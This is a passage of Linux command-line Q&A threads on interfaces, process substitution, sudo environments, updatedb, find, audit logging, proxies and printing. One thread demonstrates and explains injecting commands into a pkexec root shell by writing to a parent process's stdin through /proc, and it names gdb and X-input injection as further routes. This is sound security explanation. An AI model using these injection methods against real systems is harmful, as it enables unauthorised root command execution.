    phys_port_id
    phys_port_name
    phys_switch_id
    power
    queues
    speed
    statistics
    subsystem
    tx_queue_len
    type
    uevent

Answer to the edited question. To get the interface name along with the index:

grep:

    ip addr | grep -o '^[0-9]\+:[^:]\+'

sed:

    ip addr | sed -nE 's/^([[:digit:]]+:[^:]+).*/\1/p'

For each interface directory in /sys/class/net/, you can read the file ifindex. For example, for interface eth0, the index file is:

    /sys/class/net/eth0/ifindex
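Both ideas can be combined in a small sketch that reads the index and name of each interface straight from sysfs; the base path is a parameter here only so the function can be exercised on a mock directory tree:

```shell
#!/bin/sh
# Print "ifindex: name" for every interface directory under a sysfs-style tree.
list_interfaces() {
    base=$1
    for dir in "$base"/*/; do
        [ -e "$dir/ifindex" ] || continue
        name=${dir%/}
        name=${name##*/}
        printf '%s: %s\n' "$(cat "$dir/ifindex")" "$name"
    done
}
# On a real Linux system:
# list_interfaces /sys/class/net
```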
Can I get just the list of network interfaces from ip?
1,515,164,174,000
I have a simple bash script bash.sh that starts another bash instance using pkexec.

    #!/bin/bash
    bash -c 'pkexec bash'

When executed this shows a prompt for the user to enter their password. The main script bash.sh runs as a normal user, but the bash instance started by it runs as root with elevated privileges. When I open a terminal window and try to write some command to the standard input of the elevated bash process, it throws a permission error (as expected).

    echo 'echo hello' > /proc/<child-bash-pid>/fd/0

The problem is that when I write to the parent process (bash.sh) it gets passed to the child bash process which then executes the command.

    echo 'echo hello' > /proc/<parent-bash.sh-pid>/fd/0

I'm not able to understand how this is possible. Since the parent is running as a normal user, why am I (a normal user) allowed to pass commands to the child process which is running with higher privileges? I understand the fact that the standard input of the child process is connected to the standard input of the parent script, but if this is allowed then any ordinary process can execute root commands by writing to the parent process of a root bash process. This does not seem logical. What am I missing?

Note: I verified that the child is executing the command passed to the parent by deleting a file in /usr/share which only root would have permission to do.

    sudo touch /usr/share/testfile
    echo 'rm -f /usr/share/testfile' > /proc/<parent-bash.sh-pid>/fd/0

The file was deleted successfully.
This is normal. To understand it, let's see how file descriptors work and how they are passed between processes. You mentioned that you are using GLib.spawn_async() to spawn the shell script. That function, presumably, creates a pipe to be used for sending data into the child's stdin (or perhaps you create the pipe yourself and pass it to the function). To spawn the child process, that function will fork() off a new process, rearrange its file descriptors such that the stdin pipe becomes fd 0, and then exec() your script. Since the script starts with #!/bin/bash, the kernel interprets this by exec()ing a bash shell, which then runs your shell script. That shell script forks and execs yet another bash (this is redundant, by the way; you don't really need the bash -c in there). No file descriptors are rearranged, so the new process inherits the same pipe as its stdin file descriptor. Note that this isn't "connected" to its parent process per se - in fact, the file descriptors reference one and the same pipe, the one that was created or assigned by GLib.spawn_async(). In effect, we are merely creating aliases for the pipe: fd 0 in these processes all reference the pipe. The process is repeated when pkexec is invoked - but pkexec is a suid root binary. That means that, when that binary is exec()ed, it runs as root, yet its stdin is still connected to the original pipe. pkexec then does its permission checks (which involve prompting for a password), and then ultimately exec()s bash. Now we have a root shell which is taking its input from a pipe, while a number of other processes owned by your user also have a reference to that pipe. The important thing to understand is that, under POSIX semantics, file descriptors have no permissions. Files have permissions, but file descriptors represent the privilege to access a file (or an abstract buffer like a pipe). 
You can pass a file descriptor to a new process, or even to an existing process (via UNIX sockets), and the permission to access the file travels with the file descriptors. You can even open a file, then change its owner to another user, and yet still access the file through the original fd as the previous owner, since permissions are only checked at the time the file is opened. In this way, file descriptors allow communication across privilege boundaries. By having a process owned by your user and a process owned by root share the same file descriptor, you are granting both processes the same rights over that file descriptor. And, since the fd is a pipe, and the root process is taking commands from that pipe, that allows the other process owned by your user to issue commands as root. The pipe itself has no concept of an owner, just a series of processes that happen to have open file descriptors to it. Furthermore, since the basic Linux security model assumes that a user has complete control over all of their processes, that means you can peek into /proc to gain access to the fd, as you have done. You can't do this via the /proc entry of the bash process running as root (since you aren't root) but you can do it for your own process, and the resulting pipe file descriptor acquired is exactly the same as if you could do it directly to the child process running as root. Thus, echoing data into the pipe causes the kernel to bounce it back to the processes reading from the pipe - in this case, only the child root shell, which is actively reading commands from the pipe. If the shell script were invoked from a terminal, then echoing data into its standard input file descriptor would actually end up writing data to the terminal, and it would be displayed to the user (but not executed by the shell). This is because terminal devices are bidirectional, and, in fact, the terminal would be connected to both stdin and stdout (and stderr). 
However, terminals have special ioctl methods for injecting input data, so it is still possible to inject commands into the root shell as a user (it just takes more than a simple echo). In general, you've discovered an unfortunate truth about privilege escalation: the moment you allow a user to escalate to a root shell by any means, effectively, any application run by that user should be assumed to be able to abuse that escalation (while it exists). The user becomes root, for security intents and purposes. Even if this kind of stdin injection weren't possible, for example, if you were running the script under a terminal, you could simply use X server keyboard injection support to send commands directly at the graphical level. Or you could use gdb to attach to a process with the open pipe and inject writes into it. The only way to close this hole is to have the root shell directly connected to a secure I/O channel to the (physical) user that cannot be tampered with by unprivileged processes. This is hard to do without severely restricting usability. One last thing worth noting: normally, (anonymous) pipes have a read end and a write end, i.e. two separate file descriptors. The end passed to the child processes as stdin is the read end, while the write end would stay in the original process that called GLib.spawn_async(). That means that the child processes can't actually write into stdin to send data back to themselves or to the bash running as root (of course, processes don't normally write into stdin, though nothing says you can't - but in this case it wouldn't work when stdin is the read end of a pipe). However, the kernel's /proc mechanism for accessing file descriptors from another process subverts this: if a process has an open fd to the read end of a pipe, but you try to open its respective /proc fd file for writing, then the kernel will actually give you the write end of the same pipe instead. 
Alternatively, you could go look for the /proc entry corresponding to the original process that called GLib.spawn_async(), find the end of the pipe that is open for writing, and write into that, which would not depend on this special kernel behavior; this is mostly a curiosity but doesn't really change the security issue.
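The fd-inheritance part is easy to observe in miniature: data written into a pipe reaches a child process that never opened the pipe itself, because the descriptor (and the access it represents) is inherited across fork()/exec():

```shell
#!/bin/sh
# sh -c exec()s a brand-new process; it inherits the pipe's read end as
# fd 0 and consumes data it had no part in setting up.
printf 'hello\n' | sh -c 'read line; echo "child read: $line"'
```

This prints "child read: hello" - the child's only claim to the pipe is the inherited descriptor, exactly the situation the pkexec'd root shell is in.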
Executing commands in an elevated bash process by writing to the standard input of its parent script process
1,515,164,174,000
I would like to send stdout to multiple commands, however I'm not sure how do I read from standard input within process substitution? My attempts:

    $ echo foo >(cat /dev/stdin) >(cat /dev/stdin)
    foo /dev/fd/63 /dev/fd/62
    $ echo foo >(cat -) >(cat -)
    foo /dev/fd/63 /dev/fd/62
    $ echo foo >(cat <&3) >(cat <&3) 3<&0
    foo /dev/fd/63 /dev/fd/62
    -bash: 3: Bad file descriptor
    -bash: 3: Bad file descriptor

Alternative version of the same problem:

    $ cat file | tee &>/dev/null >(cmd1 /dev/stdin) >(cmd2 /dev/stdin)

What's the right way of doing this?
This reads from stdin:

    echo foo | tee >(read line </dev/stdin; echo "internal $line")

You have to keep in mind that a process substitution acts "like" a file. It could be used where a file is expected. The command tee expects to write to a file. In that command we are being specific about the device to read from with /dev/stdin. In that simple example, the /dev/stdin could be removed and that will work also:

    echo foo | tee >(read line; echo "internal $line")

If I am understanding your need correctly, this will work:

    $ echo foo | tee >(read a </dev/stdin; echo "a is $a") \
                     >(read b </dev/stdin; echo "b is $b") \
                     >(read c </dev/stdin; echo "c is $c")
    foo
    a is foo
    c is foo
    b is foo

I omitted the PS2 prompt to reduce confusion. Note that each process substitution replaces the use of a file (as in: tee FILE FILE ...). The read does not have to be the first command.

    $ echo foo > >(echo "hello" | read b; read a </dev/stdin; echo "a is $a")
    a is foo

Note that here the "process substitution" needs a redirection; that is the reason for the two > in the > >( idiom. A simple echo will only print the number of the fd used (the name of the file):

    $ echo >(echo "hello")
    /dev/fd/63
    hello

It is similar to:

    $ echo "$file"
    filename

Whereas this is a very different idiom:

    $ echo > "$file"
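Since the substituted processes run asynchronously, their output can interleave (hence the a/c/b ordering above). A variant that avoids the race by giving each process its own output file - a sketch assuming bash:

```shell
#!/bin/sh
# bash is required for >( ); run the demo through bash explicitly.
bash <<'EOF'
out1=$(mktemp) out2=$(mktemp)
echo foo | tee >(rev > "$out1") >(tr a-z A-Z > "$out2") > /dev/null
# bash does not wait for process-substitution children, so poll briefly.
for _ in 1 2 3 4 5 6 7 8 9 10; do
    [ -s "$out1" ] && [ -s "$out2" ] && break
    sleep 0.1
done
echo "reversed: $(cat "$out1")"
echo "upper:    $(cat "$out2")"
rm -f "$out1" "$out2"
EOF
```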
How to read from stdin in process substitution? [duplicate]
1,515,164,174,000
I am attempting to update a single directory I created. I'm using updatedb so it will be found by the locate command. Command used:

    updatedb --localpaths='/frodo/lib/modules/3.12.3-031203-generic/kernel'

Output:

    updatedb: unrecognized option '--localpaths=/frodo/lib/modules/3.12.3-031203-generic/kernel'

Same result with:

    updatedb --localpaths=
    updatedb: unrecognized option '--localpaths='

From man updatedb:

    --localpaths='path1 path2...'
        Non-network directories to put in the database. Default is /.

Why does it give this error when --localpaths is clearly stated as an option?

System info:

    updatedb --version
    updatedb (mlocate) 0.26
    Copyright (C) 2007 Red Hat, Inc. All rights reserved.
    This software is distributed under the GPL v.2.
    This program is provided with NO WARRANTY, to the extent permitted by law.

    lsb_release -a
    LSB Version:    core-2.0-amd64:core-2.0-noarch:core-3.0-amd64:core-3.0-noarch:core-3.1-amd64:core-3.1-noarch:core-3.2-amd64:core-3.2-noarch:core-4.0-amd64:core-4.0-noarch
    Distributor ID: Ubuntu
    Description:    Ubuntu 13.10
    Release:        13.10
    Codename:       saucy

    uname -r
    3.12.3-031203-generic

Edit: I have had success with updatedb -U /frodo/lib/modules/3.12.3-031203-generic/kernel, but I would still like to know why the --localpaths from the manual is not recognized. This alternative option is not in the manual, but found with updatedb -h.

    -U, --database-root PATH   the subtree to store in database (default "/")
There are two popular implementations of updatedb. One of them is from GNU findutils. Another is mlocate. They support different command line options and configuration files, especially for the updatedb program. It appears that the updatedb command on your system is the one from mlocate but the man page is the one from findutils. Normally, Ubuntu has a system (inherited from Debian) called alternatives which ensures that when there are multiple implementations of a program, the choice of program and the choice of man page are consistent. However, in this case, the updatedb man page isn't recorded in the list of alternatives, only the locate executable, the locate man page and the updatedb executable are. This is because the updatedb man pages are in a different section: findutils puts it in section 1 but mlocate puts it in section 8. Thus man 1 updatedb shows the updatedb(1) man page, because it's the only updatedb man page in section 1. And man updatedb shows the man page in section 1 because that's the first section with a match. Arguably, that's a packaging bug in mlocate: the findutils and mlocate package maintainers should agree to put the man pages for updatedb in the same section, and mlocate should declare an alternative for its man page; since mlocate puts updatedb in /usr/bin, its man page should be in section 1. As things stand, you can see the man page for the mlocate updatedb with man 8 updatedb. The mlocate implementation of updatedb doesn't have an option that's exactly equivalent to findutils's --localpaths. You can create a separate database and specify what subtree it contains with the --database-root option, or run updatedb --database-root / --database-root /frodo/lib/modules/3.12.3-031203-generic/kernel.
Updatedb unrecognized option '--localpaths='
1,515,164,174,000
Silly question, but hopefully some easy rep for someone. I am new to the linux/open source community, and I find it very feature rich, but often confusing. I am trying to configure a speedy environment for research, and want to know how to initiate a program from the terminal and, if possible, to predetermine which area of the desktop it occupies from the start. Also, I tend to use secondary monitors for extra screen real estate, if you can, please answer with respect to that.
Launching a program from the terminal is as easy as running the executable. For example:

    $ firefox &

The '&' above is optional, and it puts the process in the background, which lets you immediately run another program in the same terminal. You can only pre-determine the screen location of the program's window if the program accepts an argument to do so. Most X programs will accept a -geometry option which can be used to set the X-location, Y-location, width, and height of the window, but there is no requirement that graphical programs accept any such parameter.
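The backgrounding behaviour of '&' works for any command; $! holds the background job's PID and wait collects its exit status:

```shell
#!/bin/sh
sleep 1 &                 # run in the background
pid=$!                    # PID of the most recent background job
echo "started job $pid"
wait "$pid"               # block until it finishes
echo "job exited with status $?"
```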
Initiating programs from command line
1,515,164,174,000
If I get the result of a command in a variable, how can I print this output with newlines? Silly example:

    XX=$(ls -l); echo $XX

When I execute the above, I get one illegible line instead of the formatted output I see when ls -l is executed in a terminal. Is there any way to get the result of a command formatted, or to display its result with newlines?
You need double quotes to prevent the shell from performing field splitting:

    XX="$(ls -l)"; echo "$XX"

But it's not good to use echo with a variable whose content you don't know; you should use printf (read this answer) instead:

    XX="$(ls -l)"; printf '%s\n' "$XX"
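The effect is easy to demonstrate with a variable known to contain a newline:

```shell
#!/bin/sh
XX=$(printf 'line1\nline2')
echo $XX      # unquoted: field splitting replaces the newline with a space
echo "$XX"    # quoted: the newline is preserved, two lines are printed
```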
Print newlines on command output
1,515,164,174,000
Please explain this command in detail. I am using this command to find large files above 6 MB and split them into 5 MB chunks in the same folder. Then it removes the original files (larger than 6 MB) in the same directory.

    find . -size +6M -exec split -d -b 5M {\} {}-part \; | find . -size +6M -exec rm -rf {} \;

I have no idea about the purpose of the following portion of the command:

    {\} {}

My aim is to develop a script for backing up Virtualmin domains to Amazon S3 buckets monthly. Due to a 5 GB PUT limit on Amazon S3, I have to split the domain backups (tar.gz) into sizes less than 5 GB.
From the manpage of find:

    The string `{}' is replaced by the current file name being processed everywhere it occurs in the arguments to the command...

So, the first part of the find command searches for files greater than 6 MB and executes (-exec) split on every found file. For example, if the found file is ./path/to/file, the command executed would be:

    split -d -b 5M ./path/to/file ./path/to/file-part

{} is the placeholder replaced with the filepath. The backslash in {\} is unnecessary; it could also be written {}. In the second find command - the one after the pipe (|) - find calls rm -rf for every file.
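The split half can be sanity-checked in isolation with a round-trip on a throwaway file (GNU split assumed; the 1 MiB size and 300K chunk size are arbitrary for the demo):

```shell
#!/bin/sh
set -e
tmp=$(mktemp -d)
head -c 1048576 /dev/urandom > "$tmp/big"      # 1 MiB test file
split -d -b 300K "$tmp/big" "$tmp/big-part"    # big-part00, big-part01, ...
cat "$tmp"/big-part* > "$tmp/rejoined"         # glob order restores the file
cmp -s "$tmp/big" "$tmp/rejoined" && echo "round-trip OK"
rm -rf "$tmp"
```

The same reassembly (cat of the numbered parts) is what you would do after downloading the chunks back from S3.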
What does `{\} {}` mean in `find` command?
1,515,164,174,000
When I work with the terminal and use su or sudo to execute a command with the root user's permissions, is it possible to apply the configuration of my "non-root user" (from which I am invoking su or sudo) stored in this user's home directory? For instance, consider that (being logged on as a non-root user) I would like to edit the configuration file /etc/some_file using vim and that my vim configuration file is located at /home/myuser/.vimrc. Firing up the command line and typing sudo vim /etc/some_file, I would want "my" beautiful and well-configured vim to show up. But what I get is an ugly vim with the default configuration, no plugins etc. Can I make su or sudo use my user's configuration files instead of the root user's files located at /root?
Use sudo -E to preserve your environment:

    $ export FOO=1
    $ sudo -E env | grep FOO
    FOO=1

That will preserve $HOME and any other environment variables you had, so the same configuration files you started with will be accessed by the programs running as root. You can update sudoers to disable the env_reset setting, which clears out all environment variables and is generally enabled by default. You may have to enable the ability to use sudo -E at all in there as well. There are a few other sudoers settings that might be relevant: env_keep, which lets you specify specific variables to keep by default, and env_remove, which declares variables to delete always. You can use sudo sudo -V to see which variables are/are not preserved.

An alternative, if you can't modify sudoers, is to provide your environment explicitly:

    sudo env HOME=$HOME command here

You can make a shell alias to do that automatically so you don't have to type it in. Note that doing this (either way) can have potentially unwanted side effects: if the program you run tries to make files in your home directory, for example, those files will be created as root and your ordinary user won't be able to write to them.

For the specific case of vim, you could also put your .vimrc as the system-wide /etc/vimrc if you're the only user of this system.
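The explicit-environment form can be tried without sudo at all - env simply runs a command with the given variables overridden (/tmp/fakehome is just a placeholder path):

```shell
#!/bin/sh
env HOME=/tmp/fakehome sh -c 'echo "HOME inside: $HOME"'
```

This prints "HOME inside: /tmp/fakehome"; with sudo in front, the root-owned command would likewise see your substituted HOME.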
Use non-root user configuration for root account
1,515,164,174,000
I would like to execute source ~/.bashrc every time I finish editing a file with vim (i.e. after :wq vim command). How should I configure vim or bash to work that way?
A direct way to do it:

    vim ~/.bashrc && source $_

You can make an alias:

    alias vimbashrc='vim ~/.bashrc && source $_'

This works in bash or zsh. In other shells, you must explicitly name ~/.bashrc to source to make it work:

    alias vimbashrc='vim ~/.bashrc && source ~/.bashrc'
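The $_ mechanics (a bash/zsh feature: $_ expands to the last argument of the previous command) can be seen in isolation:

```shell
#!/bin/sh
# /tmp/some_file is an arbitrary placeholder argument for the demo.
bash -c 'true /tmp/some_file && echo "last argument was: $_"'
```

This prints "last argument was: /tmp/some_file", which is why "source $_" re-reads whatever file vim was just given.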
Configure bash and/or vim to execute source ~/.bashrc every time I finish editing it
1,515,164,174,000
When I copy, move, or delete a file in Nautilus or using the corresponding commands (cp, mv, or rm) does the same tool perform the action behind the wraps? I ask because nautilus tends to hang on big files or too many files. I have the impression that it's not that efficient.
No it doesn't just make calls to cp, mv, etc. Rather, it makes calls to a GTK+ library that contains wrapper functions around C/C++ system libraries that also contain functions. It is these C/C++ functions that are shared across Nautilus and commands such as cp, mv, etc.

Example

You can use the system tracing tool strace to attach to a running nautilus process like so:

    $ strace -Ff -tt -p $(pgrep nautilus) 2>&1 | tee strace-naut.log

Now if we perform some operations within Nautilus we'll see the system calls that are being made. Here's a sampling of the logs during the copy/paste of file /home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz.

    [pid 25897] 22:28:36.909183 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0
    [pid 25897] 22:28:36.909259 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", R_OK) = 0
    [pid 25897] 22:28:36.909302 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", W_OK) = 0
    [pid 25897] 22:28:36.909339 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", X_OK) = -1 EACCES (Permission denied)
    [pid 25897] 22:28:37.580109 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0
    [pid 25897] 22:28:37.580169 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", R_OK) = 0
    [pid 25897] 22:28:37.580215 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", W_OK) = 0
    [pid 25897] 22:28:37.580249 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", X_OK) = -1 EACCES (Permission denied)
    [pid 26667] 22:28:39.222446 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0
    [pid 26667] 22:28:39.222981 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0
    [pid 26667] 22:28:39.223201 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0
    [pid 26667] 22:28:39.223304 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0
    [pid 26667] 22:28:39.223397 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", {st_mode=S_IFREG|0664, st_size=16090900, ...}) = 0
    [pid 26667] 22:28:39.223444 open("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06.tar.gz", O_RDONLY) = 46
    [pid 26667] 22:28:39.223658 open("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", O_WRONLY|O_CREAT|O_EXCL, 0664) = 47
    [pid 25897] 22:28:39.235249 read(14, "\f\0\0\0\0\1\0\0\0\0\0\0000\0\0\0ULD_Linux_V1.00."..., 1024) = 96
    [pid 26667] 22:28:39.388744 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", <unfinished ...>
    [pid 26667] 22:28:39.388853 chmod("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", 0100664 <unfinished ...>
    [pid 26667] 22:28:39.388959 stat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", <unfinished ...>
    [pid 26667] 22:28:39.389061 utimes("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", {{1388460519, 222672}, {1384901700, 0}} <unfinished ...>
    [pid 26667] 22:28:39.391274 lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", <unfinished ...>
    [pid 26667] 22:28:39.391848 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", R_OK <unfinished ...>
    [pid 26667] 22:28:39.391955 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", W_OK <unfinished ...>
    [pid 26667] 22:28:39.392059 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", X_OK <unfinished ...>
    [pid 26667] 22:28:39.392734 lgetxattr("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", "security.selinux" <unfinished ...>

The system calls, lstat, access, open, read, etc. are the lower level calls that would be in common.
1,515,164,174,000
I am trying to find a way to execute a specific command when connecting to a server via SSH. By this I mean, the command will execute unconditionally on opening a connection, so this would preferably be run at the same time that a Banner option would be printed if set. I am not trying to run a command after logging in. What I'm after, for example: $ ssh [email protected] (Command essentially executed at this point, before the input prints.) [email protected]'s password: The reason I'm trying to do this is that I would like to run a short script which sends push notifications to my phone whenever a connection is made, regardless of whether I login or not. I had planned to use pam_exec, but this only triggers auth if a password is entered and enter is pressed, and the account and session_* modules only trigger on a successful login. If a connection is opened, but then closed such as when a user simply hits Ctrl+C, then the script will never be run. Is there any method for doing this? I'm not finding much information on the subject.
You can run sshd via inetd, with inetd running:

    sh -c 'your-command; exec sshd -iD'

upon an incoming connection (see the caveat in sshd(8) though).
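What the inetd side might look like - a sketch only: the exact inetd.conf syntax depends on your inetd variant, and /usr/local/bin/ssh-notify.sh is a hypothetical name for your push-notification script:

```
# /etc/inetd.conf (hypothetical entry)
# Run the notification script, then hand the connection to sshd in
# inetd mode (-i), not detaching (-D).
ssh  stream  tcp  nowait  root  /bin/sh  sh -c '/usr/local/bin/ssh-notify.sh; exec /usr/sbin/sshd -iD'
```

Because the script runs before sshd even sees the connection, a notification fires on every TCP connect, including ones aborted before authentication.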
Executing a remote command on SSH connection, before login
1,515,164,174,000
I have a directory structure like this:

    application1
    application1_edit
    application2
    application2_edit

Is there any way to get the total size for every folder (including sub-directories) and exclude all folders with _edit in the name? I have tried du -s on the root folder, but it lists all sub-directories.
Something like this should do it:

    $ du -s application[12]

Example:

    $ ls -l
    total 16
    drwxrwxr-x 2 saml saml 4096 Nov 28 01:51 application1
    drwxrwxr-x 2 saml saml 4096 Nov 28 01:51 application1_edit
    drwxrwxr-x 2 saml saml 4096 Nov 28 01:51 application2
    drwxrwxr-x 2 saml saml 4096 Nov 28 01:51 application2_edit

Disk usage:

    $ du -s application[12]
    4   application1
    4   application2
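The glob-based selection, demonstrated on a throwaway tree (GNU du also accepts --exclude='*_edit' as an alternative to the glob):

```shell
#!/bin/sh
set -e
tmp=$(mktemp -d)
mkdir -p "$tmp/application1" "$tmp/application1_edit" \
         "$tmp/application2" "$tmp/application2_edit"
# Only application1 and application2 are summarized; *_edit never matches.
( cd "$tmp" && du -s application[12] )
rm -rf "$tmp"
```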
Getting size of directories and exclude some folders
1,373,893,866,000
I'm looking for a way to get the PID of a short child process in Linux. The process is instant from a human perspective. I know the parent process which will spawn the child process. Is there a way to log information about all the processes that are created by a specific parent process? I'm not looking for a way to retroactively figure out the PID of the child but a way to log it once it happens.
You could use the audit system:

    sudo auditctl -a exit,always -S execve -F ppid="$pid"

would cause audit entries to be generated each time a child of $pid executes a command. audit.log would have things like:

    type=SYSCALL msg=audit(1373986729.977:377): arch=c000003e syscall=59 success=yes exit=0 a0=7ff000e4b188 a1=7ff000e4b1b0 a2=7fff928d47e8 a3=7fff928caac0 items=2 ppid=7502 pid=691 auid=10031 uid=10031 gid=10031 euid=10031 suid=10031 fsuid=10031 egid=10031 sgid=10031 fsgid=10031 ses=1 tty=pts5 comm="echo" exe="/bin/echo" key=(null)
    type=EXECVE msg=audit(1373986729.977:377): argc=2 a0="/bin/echo" a1="test"
    type=CWD msg=audit(1373986729.977:377): cwd="/tmp"
    type=PATH msg=audit(1373986729.977:377): item=0 name="/bin/echo" inode=131750 dev=fe:00 mode=0100755 ouid=0 ogid=0 rdev=00:00

where you can find the pid amongst other things. If you're interested in processes that don't necessarily execute something, you can add audit rules for the fork and clone system calls.
How to get the id of a very short child process if the parent is known?
1,373,893,866,000
I'm living in China, and lots of web services are not available or stable here, like GitHub/Bitbucket/Imgur. When I'm using wget, git or some other command-line tools, I need to use a proxy. Is there any tool to globally wrap socket connections in one terminal, so I don't need to memorize the separate proxy method for each command-line tool? I know there are some tools which can wrap the standard socket library.
I found one; it is proxychains: https://github.com/haad/proxychains
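Typical usage is to prefix the command, e.g. proxychains wget <url> or proxychains git clone <url>. The proxy itself goes in the configuration file; a minimal sketch (the SOCKS address and port are placeholders for whatever local proxy you actually run):

```
# ~/.proxychains/proxychains.conf (or /etc/proxychains.conf)
strict_chain
proxy_dns
[ProxyList]
socks5 127.0.0.1 1080
```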
Commandline global proxy program?
1,373,893,866,000
I'm running Fedora 17, Gnome (3?), and using bash from terminal. Whenever I run lpstat I only get a list of my jobs, but every time I go to retrieve my jobs from the printer, somebody else is printing and mine hasn't even started! What gives? I want to view a list of all users' jobs, not just mine. I tried lpq to no avail. I've also tried lpstat -t and same result -- just my jobs, not anyone else's. What am I doing wrong here?
lpstat -u all (as root) should show all users and all jobs that are currently queued:

    -u <logon-IDs>
        Prints the status of output requests for users, in which <logon-IDs> can be one or all of the following:

        <user>       - A user on the local system, as in lpstat -u user
        <host!user>  - A user on a system, as in lpstat -u systema!user
        <host!all>   - All users on a particular system, as in lpstat -u systema!all
        <all!user>   - A particular user on all systems, as in lpstat -u all!user
        all          - All users on all systems specified, as in lpstat -u all
View all user's printing jobs from the command line
1,373,893,866,000
In the grub.conf configuration file I can specify command line parameters that the kernel will use, i.e.: kernel /boot/kernel-3-2-1-gentoo root=/dev/sda1 vga=791 plasticDuck After booting up a given kernel, is there a way to tell if all parameters were passed 'correctly'? I.e. there is no plasticDuck kernel parameter, but: dmesg | grep plasticDuck only returns: Kernel command line: root=/dev/sda1 vga=791 plasticDuck (no error)
I don't think there's a command that lists built-in module parameters and their values. If you know the path to the driver files you could list the parameters for that module, e.g. if you used ipv6.autoconf=0 as a kernel boot parameter you could run:

    ls -1 /sys/module/ipv6/parameters/
    autoconf
    disable
    disable_ipv6

and then, if the specified parameter is in the list (i.e. it is valid), check its value:

    cat /sys/module/ipv6/parameters/autoconf
    0

Or, in your particular case - atkbd:

    cat /sys/bus/serio/drivers/atkbd/serio0/softraw
    1

As per Gilles' post, for loadable modules you could use modinfo to list specific parameters and possible values, but that doesn't work for built-in modules (although there have been attempts to add support for built-in modules):

    modinfo ipv6
    modinfo: ERROR: Module ipv6 not found.
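For the simpler question of whether a token made it onto the command line at all, you can tokenize the command line yourself. The sketch below uses a hardcoded sample string; on a live system you would read /proc/cmdline instead. This does not validate the parameter against the kernel's known options, it only tells you it was passed.

```shell
# Sample kernel command line; on a real system: cmdline=$(cat /proc/cmdline)
cmdline="root=/dev/sda1 vga=791 plasticDuck"

has_param() {
    # Succeeds if $1 appears as "name" or "name=value" on the command line.
    for tok in $cmdline; do
        case $tok in
            "$1" | "$1"=*) return 0 ;;
        esac
    done
    return 1
}

has_param vga         && echo "vga was passed"
has_param plasticDuck && echo "plasticDuck was passed"
has_param quack       || echo "quack was not passed"
```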
How to tell of whether the kernel parameter [passed at command line] is a valid kernel parameter?
1,373,893,866,000
updated: I'd like to save a large amount of data (~100 MB) from standard input in a temporary location for the duration of my bash session. Redirecting it to a file won't work as I have only 30 MB of free space. I also don't want to save it in a variable. I'd obviously have to utilize some space other than my disk storage, which leaves my RAM. Is there some mechanism that will allow me to write to it, and then to retrieve the written data again (like when you pipe to and from /dev/null)?
You can mount a ramfs and store the data there (as a file):

    # mkdir /media/ram
    # mount -t ramfs none /media/ram
    # <textfile grep pattern >/media/ram/ram
    # cat /media/ram/ram
    # umount /media/ram
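Mounting a ramfs needs root. Two hedged alternatives if you don't have it: most Linux systems already have a user-writable tmpfs at /dev/shm you can write to directly, and if the data is compressible text, gzipping the stream on the way to disk may make 100 MB fit into 30 MB of free space. A small sketch of the compression route (printf stands in for your real data producer):

```shell
# Write the stream compressed straight to disk...
printf 'line one\nline two\n' | gzip > /tmp/stash.gz

# ...and stream it back later without ever storing it uncompressed.
# (On most systems you could use /dev/shm/stash.gz instead, keeping it in RAM.)
gunzip -c /tmp/stash.gz | grep two
```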
How to save temp data
1,373,893,866,000
I've tried using answers given on here, and it doesn't seem to be working. Below are the commands I tried to remove all files with the index.php prefix in this directory on my CentOS system. The first two seem to have run but didn't do anything? $ find . -prune -name 'index.php.*' -exec rm {} + $ find . -prune -name 'index*' -exec rm {} + $ rm index.php* -bash: /usr/bin/rm: Argument list too long
Let's assume we have this set of test files:

    $ tree
    .
    ├── index.php
    ├── index.php.bar
    ├── index.php.foo
    ├── keppme.php
    └── level1
        ├── index.php
        ├── index.php.l1
        ├── keepme.php
        └── level2
            ├── index.php
            ├── index.php.foo
            └── keepme.php

Delete all files starting with index.php:

    $ find . -type f -name 'index.php*' -delete

The test files then look like:

    $ tree
    .
    ├── keppme.php
    └── level1
        ├── keepme.php
        └── level2
            └── keepme.php

Or delete only those with something added after the .php extension (like index.php.foo) but keep index.php itself:

    $ find . -type f -name 'index.php.*' -delete

The test data then shows:

